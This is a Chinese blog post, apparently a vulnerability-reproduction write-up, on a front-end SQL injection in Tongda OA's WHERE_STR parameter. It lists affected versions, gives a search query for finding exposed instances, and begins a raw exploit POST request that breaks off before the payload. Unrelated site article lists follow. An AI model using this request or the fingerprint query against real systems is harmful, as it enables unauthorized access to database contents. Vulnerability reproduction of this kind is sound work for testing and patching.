【漏洞复现-通达OA】通达OA WHERE_STR 存在前台SQL注入漏洞

一、漏洞简介

通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA WHERE_STR存在前台SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。

二、影响版本

● 通达OA V11.2-通达V11.6

三、资产测绘

● hunterapp.name="通达 OA"
● 特征
在这里插入图片描述

四、漏洞复现

POST /general/management_center/portal/oa_engine/engine_manage_bulletin_number/query.php HTTP/1.1
Host: {hostname}
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=a817a534f7c99980f8be6ad061b4c2cb; USER_NAME_COOKIE=admin; OA_US

最近更新

  1. TCP协议是安全的吗?

    2024-02-21 11:54:01       18 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-02-21 11:54:01       19 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-02-21 11:54:01       18 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-02-21 11:54:01       20 阅读

热门阅读

  1. 编程笔记 Golang基础 011 控制台输入与输出

    2024-02-21 11:54:01       27 阅读
  2. 浙大版C语言题目集-函数题6

    2024-02-21 11:54:01       31 阅读
  3. uniapp 放大中间图标

    2024-02-21 11:54:01       33 阅读
  4. SpringBoot整理-Actuator

    2024-02-21 11:54:01       30 阅读
  5. 2024年云计算环境下安全好用的堡垒机推荐

    2024-02-21 11:54:01       30 阅读
  6. Json详解

    2024-02-21 11:54:01       25 阅读
  7. 基于Spring Boot的多级缓存系统设计

    2024-02-21 11:54:01       24 阅读
  8. redis相关面试题

    2024-02-21 11:54:01       35 阅读
  9. python Opencv 中绘制图

    2024-02-21 11:54:01       28 阅读
  10. C语言学习第三十天(排序)

    2024-02-21 11:54:01       30 阅读